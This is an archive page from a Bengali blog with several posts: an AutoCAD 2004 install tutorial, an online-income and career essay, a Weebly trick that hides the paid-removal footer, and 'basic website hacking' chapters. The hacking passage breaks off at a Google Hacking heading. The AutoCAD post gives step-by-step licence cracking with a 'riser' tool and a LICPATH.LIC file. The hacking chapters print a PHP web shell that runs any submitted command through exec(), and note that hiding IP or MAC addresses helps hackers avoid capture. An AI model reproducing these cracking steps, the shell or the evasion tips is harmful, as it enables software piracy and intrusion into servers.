Archive for February 2012

অধ্যায়-১ : অটোক্যাড টিউটোরিয়াল

বিসমিল্লাহীর রাহমানির রাহিম

অটোক্যাড টিউটোরিয়াল আজ থেকে আরম্ভ হল। অনেকদিন আগে ফেসবুকে ঘোষনা দিয়েছিলাম যে, অটোক্যাড এর টিউটোরিয়াল আরম্ভ করব। তাহলে শুরু করা যাক আমাদের যাত্রা। অটোক্যাড টিউটোরিয়াল এ আমরা শিখব-
  • অটোক্যাড ফান্ডামেন্টাল
  • সফটওয়্যার ইন্সটলেশন
  • অটোক্যাড 2D
  • অটোক্যাড 3D
  • 3D Studio Max (Architectural Visualization )
AutoCAD Fundamental

AutoCAD হচ্ছে Autodesk Inc. এর একটি আর্কিটেকচারাল সফটওয়্যার। শব্দ AutoCAD এর full meaning হচ্ছে Automatic Computer Aided Design বা Automatic Computer Aided Drafting. AutoCAD সফটওয়্যার সর্বপ্রথম অবমুক্ত করা হয় ১৯৮২ সালের ডিসেম্বর মাসে। সর্বপ্রথম AutoCAD চালানো হয় IBM পিসিতে। AutoCAD এ প্রথম পর্যায়ে যে ফিচারগুলো ছিল সেগুলো হল lines, circles, polylines, arch and text. AutoCAD এর MacOS Unix ভার্সন আসে যথাক্রমে ১৯৯০ ও ১৯৯৪ সালে।

 অটোক্যাড এর রিলিজ হিস্টোরী দেখতে এখানে ক্লিক করুন।


অটোক্যাড 2D

সফটওয়্যার সেটাপ দেয়ার পদ্ধতি :
               অটোক্যাড সফটওয়্যারটির সেটাপ প্রক্রিয়া অন্য সকল সফটওয়্যার থেকে একটু আলাদা প্রকৃতির, তবে বেশ সহজ। আমরা এখন ধাপে ধাপে সেটাপ প্রক্রিয়া শিখব। আমরা অটোক্যাড ২০০৪ সেটাপ দেব। সেটাপের প্রথম পর্যায়ে আপনার কম্পিউটারে মাইক্রোসফট ডট নেট ফ্রেমওয়ার্ক সেটাপ থাকতে হবে। এবার কম্পিউটারের যে ফোল্ডারটিতে অটোক্যাড ২০০৪ রয়েছে সেটি ডাবল ক্লিক করে খুলুন। এখানে নিচের মত চিত্র দেখতে পাবেন।

চিত্রে দেখানো ACAD লেখা আইকনটিতে ডাবল ক্লিক করুন। এবার নিচের মত চিত্র আসবে।

নেক্সট ক্লিক করুন। নিচের মত চিত্র আসবে।

I accept এ ক্লিক করে নেক্টট চাপুন। নিচের মত চিত্র আসবে।

নেক্সট চাপুন। নিচের মত চিত্র আসবে।

উপরের বক্সগুলোতে সঠিক তথ্য দিন। সবশেষে নেক্সট চাপুন। নিচের মত চিত্র আসবে।

Full সিলেক্ট করে নেক্সট চাপুন। নিচের মত চিত্রের আসবে।

সফটওয়্যারটি আপনার কম্পিউটারের কোন ড্রাইভে সেটাপ/ইনস্টল করবেন সেই পাথ দেখিয়ে দিতে Browse এ ক্লিক করুন। সাধারনত ডিফল্ট হিসেবে C: ড্রাইভ দেয়া থাকে। আপনি ইচ্ছে করলে এটা পরিবর্তন না করেই নেক্সট এ ক্লিক করুন। নিচের মত চিত্র আসবে।

Display the AutoCAD 2004 shortcut on my desktop লেখার পাশের বক্সটিতে ক্লিক করে নেক্সট চাপুন। নিচের মত চিত্র আসবে।

নেক্সট চাপুন। সেটাপ প্রক্রিয়া শুরু হবে। সবশেষে ফিনিশ বাটন চাপুন।
এবার আপনি পুনরায় সেই ফোল্ডারে ফিরে যান যেখানে আপনার অটোক্যাড সেটাপ ফাইলটি ছিল। সেখানে দেখতে পাবেন Crack নামে একটি ফোল্ডার রয়েছে। এতে ডাবল ক্লিক করুন। নিচের মত চিত্র দেখতে পাবেন। 

উপরে তিনটি ভিন্ন ভিন্ন আইকন দেখতে পাচ্ছেন। এখানের riser লেখাতে ডাবল ক্লিক করুন। নিচের মত চিত্র আসবে।

Yes প্রেস করুন। তারপর Ok প্রেস করুন। এখন riser এর পাশে দেখুন LICPATH.LIC নামে আরেকটি ফাইল রয়েছে। এটি কপি করুন। তারপর My Computer এ প্রবেশ করুন। ড্রাইভ C তে যান। তারপর Programs Files এ প্রবেশ করুন। সেখানে AutoCAD 2004 নামে একটি ফোল্ডার দেখতে পাবেন। ফোল্ডারটিতে ঢুকুন আর আপনার কপিকৃত ফাইলটি এখানে পেস্ট করে দিন। এবার সমস্ত প্রক্রিয়া থেকে বেরিয়ে এসে কম্পিউটার রিস্টার্ট দিন। অটোক্যাড এর সেটাপ প্রক্রিয়া সম্পন্ন হয়েছে। এবার আপনার ডেস্কটপে দেখুন অটোক্যাড এর একটি শর্টকাট আইকন দেখা যাচ্ছে। সেটাতে ডাবল ক্লিক করে অটোক্যাড ওপেন করুন। নিচের মত চিত্র দেখতে পাবেন।

একদম উপরে দেখা যাচ্ছে টাইটেল বার। তার নিচেই হচ্ছে মেনু বার। নিচে আরো কিছু টুলবার দেখা যাচ্ছে। সেগুলোর নাম নিজ দায়িত্বে শিখে নিতে হবে। আমরা অটোক্যাড এর এই নোটে টুলবারের কাজ দেখাবো না। কারন মেনুবার বা টুলবারের সাহায্যে অটোক্যাড এ ডিজাইন করতে গেলে প্রচুর সময় নষ্ট হয়। আমরা ডিজাইন শিখব কমান্ড এর সাহায্যে। এটা অত্যান্ত দ্রুত প্রক্রিয়া, এবং মনে রাখা সহজ। এর সাহায্যে ড্রয়িং হয় অনেকটা নির্ভূল।
কালো যে ফিল্ডটি দেখতে পাচ্ছেন সেটি হচ্ছে আমাদের ড্রয়িং এরিয়া। এখানেই সকল ড্রয়িং করতে হয়। এখানে মাউসের কার্সর চার কোনা। এটা ডিফল্ট থাকে। পরবর্তীতে এটাকে পরিবর্তন করা যায়। এর নিচেই সাদা যে ঘর দেখতে পাচ্ছেন এটি হচ্ছে কমান্ড এরিয়া। এখানেই কমান্ড লিখতে হয়। একেবারে নিচে স্ট্যাটাস বার । অটোক্যাড এর সার্বিক আউটলুক সম্পর্কে আমাদের একটা সাম্যক জ্ঞান হল। আজ এ পর্যন্তই।

প্রিয় বন্ধুরা, এই বাংলা ব্লগ-এ আপনারা পড়ছেন অধ্যায়-১ : অটোক্যাড টিউটোরিয়াল

অনলাইনে আয়, ক্যারিয়ার ও আরো কিছু কথা (পোষ্টটি সকলকে পড়ার জন্য অনুরোধ জানাচ্ছি)


‘অনলাইনে আয়’ কথাটি মনে হয় আমাদের দেহের প্রতিটি রন্ধ্রে রন্ধ্রে পৌছে গেছে। কথাটি শুনলেই আমরা কেমন যেন রোমাঞ্চ অনুভব করি। অনলাইনে আয় করা যায় কথাটি যেমন সত্য অফলাইনেও আয় করা যায় কথাটি তেমন সত্য। অনলাইনে আয়ের অনেকগুলো মাধ্যম রয়েছে। পিপিসি, পিটিসি, পিটিএস, রেফারেল, এ্যাফিলিয়েট, এমএলএম, আউটসোর্সিং ইত্যাদি যা আমরা সকলেই জানি। এ নিয়ে আগেই অনেক জল্পনা-কল্পনা-আলোচনা হয়ে গেছে। কেউ বলেছে অনলাইনে আয় এত সহজ ব্যাপার না-কেউ বা বলেছে আমিতো আয় করেই চলেছি-কেউ বলেছে সাইটটি আইনসিদ্ধ (Legitimate) নয়-কেউবা এর বিপক্ষে পে-আউটের প্রমান নিয়ে হাজির হয়েছেন। আসলে দ্বন্ধ্ব কিন্তু লাগছে নিজেদের ভেতরেই। বিদেশী প্রতিষ্ঠানগুলো আমাদের বোকা বানাচ্ছে। এখন আপনারা হয়তো বলবেন, কি বলছেন আপনি? আউটসোর্সিংয়ের ক্ষেত্রেতো আপনার যুক্তি খাটবে না!……………lolz

ভালো কথা। এটি আমিও জানি, কারন আমি নিজেও আউটসোর্সিং করতাম গ্রাফিক্স ডিজাইনার হিসেবে। এখন কথা হল কয়জনে কাজ পায়? আউটসোর্সিংয়ে প্রথম বাধা হল কাজ পাওয়া। তারপর বায়ারের মন যোগানো, ঠিকমত কাজ না করলে পেম্যান্টে ঝামেলা, কাজ না দেওয়ার হুমকি ইত্যাদি। আসলে এধরনের সমস্যায় আমাদের হর-হামেশাই জড়াতে হয়। কারন লোডশেডিং, ইন্টারনেটের দুবর্ল গতি, কম্পিউটার ভাইরাস আরও কত্ত কি! কয়েকদিন আগে একভাই আমাকে ফোন করে জিজ্ঞেস করল, “ভাইয়া আমি কম্পিউটারে বিএসসি-তে ভর্তি হয়েছি, এখন আমি আমার ভবিষ্যৎ পরিকল্পনা ঠিক করতে পারছি না। আপনি কিচু উপদেশ দেন।“ আসলে এই ব্যাপারটি বাংলাদেশের মূল সমস্যার মধ্যে অন্যতম।
এর কারন হচ্ছে অপরিকল্পিত শিক্ষা। বিদেশে মা-বাবারা তাদের সন্তানের ভবিষ্যৎ শিশু বয়সেই ঠিক করে রাখে। শিশুটি কোন বিষযে আগ্রহী তার উপর ভিত্তি করেই তার ভবিষ্যৎ গড়ে ওঠে। আর বাংলাদেশে দেখা যায় বুয়েট থেকে পাশ করার পর ছেলেটি গার্মেন্টস এর ব্যবসা করছে। আমার দু:খ এই জায়গাটাতেই। সে কি তার শিক্ষা কাজে লাগাতে পারলো? না কেন না? কারন বাংলাদেশে ঐ সকল গ্রাজুয়েটদের মূল্যায়ন নেই। কার দোষ? জনগনের, সরকারের নাকি অন্য কোন ব্যাপার? যাক প্যাচাল বাদ। আমি বর্তমানে একটি আমদানি-রপ্তানী সংস্থার সাথে জড়িত। যখন এই পেশায় প্রবেশ করি তখন দেশ-বিদেশের বিভিন্ন বায়ার বা সেলারের সাথে পরিচয় ঘটে।

বাংলাদেশের ব্যবসায়ীরা আমাকে চেনে মি. মেহেদী নামে আর বিদেশী ব্যবসায়ীরা আমাকে চেনে মি. হাসান নামে…..lolz আমদানী-রপ্তানী বা ব্যবসায় মূলত যে ব্যপারটি ঘটে সেটি হচ্ছে বিটুবি। এটিকে আরও ভেঙ্গে বলা যায় বিজনেস টু বিজনেস। এর আরও কয়েকটি ভাগ রয়েছে। যেমন বিজনেস টু কমার্স, বিজনেস টু কনজিউমার, কমার্স টু কমার্স, কমার্স টু কনজিউমান, কনজিউমার টু কনজিউমার ইত্যাদি। আসলে এগুলোর মূল উদ্দেশ্য একটাই, তা হচ্ছে সেলারের সাথে বায়ারের সংযোগ ঘটানো বা উদ্যোকতার সাথে অর্থ বিনিয়োগকারীর সংযোগ ঘটানো। আমরা জানি চাইনিজরা এখন সমস্ত পৃথিবীর প্রায় অর্ধেক ব্যবসা মার্কেট দখন করে রেখেছে। কেন? তাদের জনশক্তি বেশী বলে? তাদের দেশ বড় বলে? তাদের সরকার ভালো বলে? নাকি তাদের অর্থনৈতিক অবস্থা উন্নতি বলে? হ্যা, উপরের সবগুলোতেই তারা স্বয়ংসম্পূর্ণ। তাই বলে এই নয় যে তারা ওগুলোর কারনে এত অগ্রসর।

তাদের উন্নতির মূল কারন হচ্ছে তাদের একতাবদ্ধতা। যেটাকে আমরা ইংরেজীতে বলি Unity. ছোটবেলায় আমরা পড়তাম ‘একতাই বল’। কথাটি খুবই সত্য। আমাদের বাংলাদেশেও দুটি অন্ঞলের মানুষ এই একতাবদ্ধের কারনে উন্নত। আপনারা সিলেট ও নোয়াখালির কথা জানেন। বিস্তারিত বললাম না।

আমার একটা ঘটনা বলি। আমি একবার এক চায়নার গাড়ি নির্মাতা প্রতিষ্ঠানের সেলসম্যানের সাথে কথা বলছি। একসময সে বলল, তোমরা কি কি আমদানী কর? আমি তাকে আমাদের ওয়েবসাইট দেখার জন্য বললাম। সে দেখে বলল, খুবই ভালো। আমি দেখছি তোমরা কনজিউমার ইলেকট্রনিক্স আমদানী কর। আমার মনে হয় তোমাকে এ ব্যাপারে সাহায্য করতে পারব। আমার এক বন্ধু আছে যে কনজিউমার ইলেকট্রনিক্সের ব্যবসা করে। তুমি বললে, আমি তাকে তোমার কথা বলতে পারি। সেক্ষেত্রে আমার বন্ধু হিসেবে তুমি ভালো ডিসকাউন্ট আশা করতে পারো। আমি তাকে বললাম, সেটাতো খুবই ভালো হয়। সে তাৎক্ষনাৎ তার বন্ধুর সাথে স্কাইপিতে কথা বলল এবং আমাকে তার স্কাইপি আইডি দিল। আমিও তার সাথে কথা বললাম। ব্যাস এখন তার সাথে আমাদের ব্যবসা প্রোসেসিং চলছে। অথচ আমাদের বাঙালিরা এক্ষেত্রে করত কি, হয়ত বলত হ্যা আমি এই ব্যবসা করি (এক্ষেত্রে মিথ্যাচারিতা বেশি থাকে), বা করি না। অথচ খুজলে দেখা যাবে তার কোন আত্মীয় বা বন্ধুই এই ব্যবসার সাথে জড়িত।

এবার একটি কমন কৌতুক বলি। জাহান্নামে প্রত্যেক জাতির জন্য আলাদা আলাদা জায়গা বরাদ্ধ করা হয়েছে। প্রায় প্রতিটি জায়গাতেই উচু প্রাচীর দিযে ঘেরা এবং প্রহরী বসানো হয়েছে। যাতে জাহান্নামীরা পালিয়ে যেতে না পারে। কিন্তু যেই জায়গাটিতে বাঙালিরা ছিলো সেখানে কোন প্রহরী বসানো হয়নি। এই ব্যাপারটা ফেরেসতাদের কাছে খটকা লাগলো। তারা আল্লাহ তাআলার নিকট এই ব্যাপারটি জানতে চাইল। আল্লাহ তাআলা তাদের বললেন, আমি যা জানি তোমরা তা জানো না। যখনই কোন বাঙালা জাহান্নামী পলায়নের চেষ্ঠা করার জন্য প্রাচীর চেয়ে উঠতে চেষ্ঠা করে তখনই তাদের জাতিরা তাকে টেনে আবার নীচে নামিয়ে দেয়। তাদের এ নিবুর্দ্দিতার কারনে আমি সেখানে কোন প্রহরী নিযুক্ত করিনি। আসলে আমাদের স্বভাবটাই এমন। যখন দেখি কেউ উন্নতি করছে তখনই আমরা তার বিরুদ্ধে উঠে পড়ে লাগি। স্বভাবতই তার উন্নতি শিকেয় উঠে যায়। অন্যদিকে ঐ লোকটি যখন ধনি হওয়ার রাস্তা বের করল সে চেষ্ঠা করবে যাতে এই রহস্য আর কেউ না জানে। আর এ কারনেই বাঙালিদের এত অধপতন।
এবার আসি মূল কথায়। আমি এখন যে পদ্ধতিটির কথা বলব তা এর আগে ইংরেজিতে প্রকাশ করেছিলাম যা বিভিন্ন বিটুবি ফোরাম এবং ব্লগে প্রকাশিত হয়েছিল। যারা অনলাইনে এবং সোস্যাল নেটওয়ার্কিংয়ে অযথাই সময় নষ্ট করছেন তাদের জন্য আমার এ পদ্ধতি।

•    ১। প্রথমেই আপনি www.linkedin.com এ রেজিষ্ট্রেশন করে নিন।
•    ২। আপনার প্রোফাইলটি যথাসম্ভব রিচ করুন। আপনার ছবি আপলোড করুন।
•    ৩। এবার কানেকশান খুজতে থাকুন। এমন লোক খুজবেন যারা বড় বড় ব্যবসায়ী বা বড় বড় কোম্পানীতে চাকুরী করে। সেক্ষেত্রে আপনি কোন বিষয়টিতে আগ্রহী সেটি বের করা জন্য www.StareonGroup.com এর clothing অংশে যান এবং সেখান থেকে ঠিক করে নিন আপনি কোন বিষয়টির উপর কাজ করবেন। সে বিষয়টি সম্পর্কে লিংকডইন এ বায়ার এবং সেলার খুজতে থাকুন।
•    ৪। আপনি যে বিষয়টি বেছে নিয়েছেন সে সম্পর্কে গুগলিং করে তথ্য বের করুন এবং পড়াশুনা করুন। যখন সমস্ত বিষয়টি সম্পর্কে আপনার সাম্যক ধারনা জন্মাবে তখন আপনি লিংকডইন এ সে সকল বায়ারদের সাথে যোগাযোগ করুন। আপনি তাদের কি সার্ভিস দিতে পারবেন সেটা বলুন।
•    ৫। গুগলিং করে আপনার বিষয় সম্পর্কিত বায়ারদের ইমেইল আইডি খুজুন। ইমেইল করুন। এভাবে একজন দুজন করে চালিয়ে যান। এদের মধ্যে কোন বায়ার আপনার সার্ভিসটির ব্যাপারে আগ্রহী প্রকাশ কররে আপনি সাথে সাথে কোন বায়িং হাউসের সাথে কথা বলুন। এক্ষেত্রে আপনি কাজ করবেন সম্পূর্ণ কমিশনের ভিত্তিতে। মূল লেনদেনের একটা নির্দিষ্ট অংশ আপনি কমিশন হিসেবে সেলার হতে পাবেন। এবং ভবিষ্যতেও তাদের সাথে ব্যবসা করার পথ সুগম হল। আপনি ইচ্ছে করলে আমার সাথেও যোগাযোগ করতে পারেন। কারন আমাদের একটা বায়িং হাউস আছে। আপনি আপনার সার্ভিস সম্পর্কিত একটি ব্লগ্ও খুলতে পারেন।
•    ৬। কয়েকটি বিটুবি সাইটে রেজিষ্ট্রেশন করুন। সেখানে বায়ার পাওযা সহজ। রেসপন্সও খুব তারাতারি পাওয়া যায়। স্বনামধন্য দুটি বিটুবি সাইট হচ্ছে www.alibaba.com এবং www.ecplaza.net
•    ৭। চালিয়ে যান, পড়াশোনা করুন, যত পারবেন জানবেন। একসময় দেখবেন অনলাইনে টাইম পাস করতে করতে আপনি একজন বড় ব্যবসায়ী হয়ে উঠেছেন। বলা যায় না আপনি নিজেও তখন দিয়ে দিতে পারবেন নিজস্ব বায়িং হাউস। ঠাট্টা নয়, এটাই বাস্তবতা। ভারত ও পাকিস্তানে এ রকম হাজারো উদাহরন রয়েছে।

শেষ করছি এই বলে যে, ব্যবসায় বিশ্বাস হচেছ প্রধান চালিকা। ব্যবসা টিকে থাকে এটির উপরেই। নিজে চেষ্ঠা করুন। মামু-খালুর উপর ভরসা করে থাকবেন না। যে যেই বিষয়ের উপর পড়াশোনা করছেন সেই বিষয়ের উপরেই কাজ করুন, তাতে আনন্দ পাবেন। যে বিষয় পড়ছেন তা ভালো না লাগরে ছেড়ে দিন। পছন্দের বিষয়ে ভর্তি হোন। জীবন একটাই। এটাকে বরবাদ করবেন না। অপরকে সবসময সহায়তা করুন। নি:স্বার্থভাবে কাজ করুন। দেখবেন আল্লাহ তাআলা আপনাকে সাহায্য করবেন। কোন সমস্যা হলে জানাবেন। সবাই ভালো থাকুন।

প্রিয় বন্ধুরা, এই বাংলা ব্লগ-এ আপনারা পড়ছেন অনলাইনে আয়, ক্যারিয়ার ও আরো কিছু কথা 

weebly তে ফ্যাভিকন যোগ ও ফুটার অদৃশ্য করার পদ্ধতি


আমাদের যাদের ডোমেইন বা হোস্টিং কেনার সামর্থ্য নেই বা থাকলেও ওয়েবসাইট ডিজাইন খুব একটা বুঝি না তাদের জন্য weebly নামক একটি কোম্পানী একেবারে বিনামূল্যে সাবডোমেইন সহ হোস্টিং ফ্রি দিচ্ছে। এই প্ল্যাটফর্মে যে কেই নূন্যতম বেসিক জ্ঞান দিয়েও দৃষ্টিনন্দন ওয়েবসাইট তৈরী করতে পারবে। আপনার যদি weebly তে কোন একাউন্ট না থেকে থাকে তাহলে এখানে ক্লিক করে একটি একাউন্ট বানিয়ে নিন। তারপর আরম্ভ করে দিন ওয়েবসাইট তৈরী। weebly তে আপনি রেফারেল পদ্ধতিতে আয় করতে পারবেন এছাড়াও পারবেন স্বনামধন্য Google Adsense এর মাধ্যমেও আয় করতে। এবার আসল ব্যাপারটি বলা যাক।
weebly র দেয়া ওয়েবসাইটগুলোতে সাধারনত ফুটারে অর্থাত ওয়েবসাইটের নীচে একটি লিখা থাকে যেখানে বলা থাকে উইবলির মাধ্যমে নতুন একটি ওয়েবসাইট বানান। এই লিখাটি উঠাতে হলে আপনাকে টাকা দিয়ে উইবলি প্রো কিনতে হবে। আর একটি ব্যাপার হচ্ছে আপনি এখানে favicon এ্যাড করতে পারবেন না যতক্ষন না পর্যন্ত আপনি উইবলি প্রো কিনছেন। কিন্তু আমি এখানে যে টিউটোরিয়াল দেব তার সাহায্যে আপনি উইবলি প্রো না কিনেই একেবারে বিনামূল্যে উইবলিতে ফুটার অদৃশ্য ও ফ্যাভিকন অ্যাড করতে পারবেন। তো শুরু করা যাক।
প্রথমে আপনার ফেভিকনটি ডিজাইন করুন। এবার এটিকে JPEG/JPG মুডে সেভ করুন। এখন এখানে ক্লিক করে একে .ico ফরম্যাটে রূপান্তরিত করুন। এবার আপনার পাবলিশার ওয়েবসাইটে ফিরে গিয়ে favicon নামে নতুন একটি পেজ তৈরী করুন। এখন পেজের উপরে বাম পাশে Multimedia এর অন্তর্গত File মাউস দিয়ে ড্র্যাগ করে পেজে টেনে এনে ছেড়ে দিন। এবার আপনার ফেভিকনটি আপলোড করুন।
এখন আপনি আপনার ওয়েবসাইটটি দেখুন এবং ফেভিকনটি ডাউনলোডের জন্য ক্লিক করুন। লক্ষ্য করুন আপনার ব্রাউজারে http://www.yoursite.com/favicon.ico নামে কিছু এসেছে যার শেষে .ico রছেছে। এটিই আপনার কাঙ্খিত লিঙ্ক। এখন নোটপ্যাড খুলে নিচের প্রক্রিয়াটি লক্ষ্য করুন।
<link href=”Your-Favicon-URL” rel=”SHORTCUT ICON”>
উপরের Your-Favicon-URL এর স্থলে আপনি আপনার কাঙ্খিত লিংকটি বসান। এবার আপনার পাবলিশারে ফিরে এসে Design থেকে Edit HTML/CSS তারপর HTML এ ক্লিক করে নোটপ্যাডে লিখিত কোডটি যেকোন স্থানে পেষ্ট করে দিন। ব্যাস হয়ে গেলো আপনার পেজে ফ্যাভিকন যোগ করা।
এবার আসি ফুটারের লেখাটি গোপন করার পদ্ধতি নিয়ে।
প্রথমে Design তারপর Edit HTML/CSS তারপর CSS এ ক্লিক করুন। অত:পর নিচের কোডটি খুজে বের করুন।
/* Footer */
#footer
{
color: #C6DDEE;
background: #CCC url(footer.jpg) no-repeat center top;
clear: both;
width: 825px;
height: 62px;
text-align: center;
padding-top: 12px;
এখন #Footer {  এর নীচে visibility:hidden; কোডটি বসিয়ে দিন। নিচে লক্ষ্য করুন।
/* Footer */
#footer
{
visibility:hidden;
color: #C6DDEE;
background: #CCC url(footer.jpg) no-repeat center top;
clear: both;
width: 825px;
height: 62px;
text-align: center;
padding-top: 12px;
ব্যাস হয়ে গেলো কাজ শেষ। এখন আপনার ওয়েবসাইটে গিয়ে দেখুন কি দারুন ফেভিকন এবং ফুটারে কোন লিখা নেই।

প্রিয় বন্ধুরা, এই বাংলা ব্লগ-এ আপনারা পড়ছেন weebly তে ফ্যাভিকন যোগ ও ফুটার অদৃশ্য করার পদ্ধতি

অধ্যায়: ২১ বেসিক ওয়েবসাইট হ্যাকিং (তথ্য)-৩


ওয়েবসাইট হ্যাকিং :
ওয়েবসাইট হ্যাকিং করা হয় সাধারনত হ্যাকারদের নিজস্ব চাহিদা পূরন করতে বা জনপ্রিয়তা অর্জন করতে। ওয়েবসাইট হ্যাকিং একটি সাধারন ব্যাপার, এটা কোন ওয়েবসাইটের মূল ব্যবস্থা ভেঙ্গে ফেলতে ব্যবহৃত হয়। এটা থেকে বাচার জন্য ওয়েবমাস্টাররা এনক্রিপশন ব্যবহার করে। যাহোক, অনেক ওয়েব প্রোগ্রামাররাই এনক্রিপশন ব্যবহার করে না যা কিনা হ্যাকাররা খুজে বের করে আক্রমন করে। হ্যাকিং কার্য থেকে বাচার উপায় হতে পারে জাভাস্ক্রিপ্ট, এএসপি, পিএইচপি এবং সিজিআই, কিন্তু অনেক সময় ভাষার ব্যবহারও হ্যাকিং কার্য থেকে সার্ভারকে রক্ষা করে।
দুই ধরনের ওয়েব হ্যাকিং :

১। কোন ওয়েবসাইটের পাসওয়ার্ড প্রোটেকশন ভেঙ্গে ফেলা
২। ওয়েবসাইট পরিবর্তন করা।

হ্যাকারদের সুযোগ :
আপনি যখন কোন ওয়েবসাইট ব্রাউজ করেন এবং সেখানে যদি আপনার ইমেইল এড্রেস দেয়ার প্রয়োজন হয় এবং সেই ইমেইল এড্রেসটি যেখানে জমা হয় সেটাই ওয়েব সার্ভার। যদি আপনি কোন হোস্টিং সার্ভার ভেঙ্গে ফেলেন তাহলে আপনি হয়ত হাজারো ওয়েবসাইটের ক্ষতি সাধন করতে পারবেন যেগুলো ওই হোস্টিং কোম্পানীর সার্ভারে হোস্ট করা। তাছাড়া যে সকল কোম্পানীগুলো অনলাইনে পন্য বেচা-কেনা করে তাহলে হ্যাকাররা সর্বাপেক্ষা বেশি লাভবান হয়। সেক্ষেত্রে তারা ভিজিটরদের ক্রেডিট কার্ড নাম্বার চুরি করে। তবে এক্ষেত্রে বেশিরভাগ হ্যাকাররাই ধরা পড়ে। তবে আইপি,ম্যাক হাইড করলে ধরা পড়ার সম্ভাবনা কম থাকে। তাছাড়া যেসব সার্ভার সাইড এক্সেস সাপোর্ট করে এবং গেষ্টবুক এবং ফর্ম সাবমিশন রাখে সেক্ষেত্রেও হ্যাকারদের ধরা পড়ার সম্ভাবনা কম থাকে।

কিভাবে এটা ঘটে?
এটা তখনই ঘটে যখন স্ক্রিপ্ট সার্ভার সাইড ভাষায় রান হয় এবং পাসওয়ার্ড এনক্রিপ্ট করা হয় না অথবা ডাটাগুলো প্রোটেক্ট করা না হয়।যদি হ্যাকার কোন কোন ধরনের সুযোগ দেখতে পায় তাহলে সে এটিকে ভেঙ্গে ফেলতে চেষ্টা করে।তারা এটা করে সাধারনত কিছু কোড রান করে অথবা স্ক্রিপ্ট দিয়ে পাসওয়ার্ড জেনে ফেলে অথবা আইনসিদ্ধ কোন ইউজারের গোপন তথ্য জেনে ফেলে।

প্রিয় বন্ধুরা, এই বাংলা ব্লগ-এ আপনারা পড়ছেন অধ্যায়: ২১ বেসিক ওয়েবসাইট হ্যাকিং (তথ্য)-৩

অধ্যায়: ২০ বেসিক ওয়েবসাইট হ্যাকিং (তথ্য)-২



ওয়েব সার্ভারে আক্রমন করা :
1. SQL Injection
2. PHP Remote Code Execution
3. Web Ripping
4. Google Hacking

SQL Injection :
SQL Injection হচ্ছে একধরনের আক্রমন প্রক্রিয়া যাতে ফায়ারওয়াল দিয়ে রক্ষিত ডাটাবেসের ডাটা সমূহে টার্গেট করা হয়। এটা ওয়েব নির্ভর যেকোন এ্যাপ্লিকেশনের প্যারামিটার পরিবর্তনের চেষ্টা করে যা এসকিউএল নির্ভর কোন সার্ভারথেকে ডাটা সংরক্ষন করতে ব্যবহৃত হয়।
সাধারনত, প্রথম পদক্ষেপে এটা কোন আক্রমন উপযোগী ওয়েব এ্যাপ্লিকেশন অরক্ষিত করে। এই এ্যাটাকটি ঐ ওয়েব এ্যাপ্লিকেশনটির দুর্বল কোডিং এবং ওয়েবসাইট এডমিনের সুযোগ গ্রহন করে।
একটি SQL Injection এর মাধ্যমে কোন আক্রমন উপযোগী ওয়েব সার্ভারকে আক্রমনের মাধ্যমে এর কর্তৃত্ব নেয় যাতে করে ঐ সার্ভার ডাটাবেসের যেকোন তথ্য পড়া, পরিবর্তন করা বা মুছে দেয়া যায়।

ধারনা :
SQL Injection এ ইউজার SQL কোয়েরীতে স্থাপিত যেকোন ডাটার কন্ট্রোল নিতে পারে কোনরকম ডাটার শুদ্ধতা পরীক্ষা করা ছাড়াই। এর দ্বারাই ইন্টারনেটে প্রতিদিন হাজার হাজার ওয়েব এ্যাপ্লিকেশন ক্ষতিগ্রস্থ হচ্ছে। বর্তমানে ইন্টারনেটে প্রায় ৫০% বড় ই-কমার্স সাইট এবং ৭৫% ছোট ই-কমার্স সাইট এই আক্রমন উপযোগী। কোন ওয়েবসাইটে যদি CFML, ASP, JSP এবং PHP এর অসম ব্যবহার থাকে তাহলে ঐ সকর সাইট এই আক্রমনের উপযোগী।

SQL Injection এ ভ্যালিডেশন প্রবেশ করানো :
    SQL Injection আক্রমন প্রশমিত করার জন্য কিছু টুলস বা পরিকল্পনা রয়েছে।
    ওয়েব ডেভেলোপাররা লগইন পেজে কিছু সন্ধিগ্ধ কারেক্টার প্রবেশ করায়। যেমন: ‘, “, , , — ,
    ডাটাবেসে সবসময় পাসওয়ার্ডগুলো এনক্রিপ্ট করে রাখা
    এই পদ্ধতিগুলোর সঠিক ব্যবহারেও এসকিউএল প্রতিরোধ করা যায় না, কিন্তু এগুলো হ্যাকারের হ্যাকিং কার্য কঠিন করে দেয়।

PHP Injection :
এই আক্রমন কোন টার্গেট ওয়েব সার্ভারের সিস্টেম লেভেল ভেঙ্গে ফেলতে ব্যবহৃত হয়। এই আক্রমনের দরুন, হ্যাকার ওয়েবসার্ভারটিতে প্রবেশ করতে পারে এবং এর সমস্ত ফাইলের কর্তত্ব নিয়ে নিতে পারে।

Script :
1.<form action=" " method=post>
2.<input type=text name=command>
3.<input type=hidden name=filled value=1>
4.<input type=submit value="Run Command">
5.</form>
6.<?php
7.if($_post[filled]==1)
8.{
9.$output=exec("$_post[command]")
10.print $output;
11.}
12.?>

Counter Measure :
১। এটা আপনার সার্ভারে তথ্য সাপ্লাইয়ের পূর্বেই ইউজারের দেয়া তথ্যাদির সত্যাদি পরীক্ষা করে দেথে, এটা সাধারনত জাভাস্ক্রিপ্ট বা অন্য কোন ফিল্টারিং মাধ্যমে ব্যবহৃত হয়।

Web Ripping :
ওয়েব রেপিং কোন নির্দিষ্ট ওয়েবসাইটের ঠিকানা থেকে ছবি বা ইমেজ বা অন্যান্য মিডিয়া ফাইল খুজে বের করে তা এক্সট্রাক্ট করে এবং আপনার হার্ড ড্রাইভে তা সংরক্ষন করে রাখে। ওয়েব রেপিং কোন ওয়েবসাইটটির সম্পূর্ণ গঠন আপনার হার্ড ড্রাইভে সংরক্ষনের ক্ষমতা রাখে।

সাবধানতা :  আপনি ওয়েবসাইটটির এডমিন কর্তৃক ধরা পড়ে যেতে পারেন কারন আপনিতো সেখানে একটি সাধারন ইউজার হিসেবে প্রবেশ করেছেন যাতে করে কর্তৃপক্ষ আপনার আইপি বাতিল করে দিতে পারে বা ঐ সার্ভারটি থেকে আপনার সংযোগ প্রকৃয়া কেটে দিতে পারে।
ওয়েব রেপিংয়ে ব্যবহৃত কিছু টুলস :
1). Black Widow.
2). Wget
3). Web Sleuth.

Google Hacking :
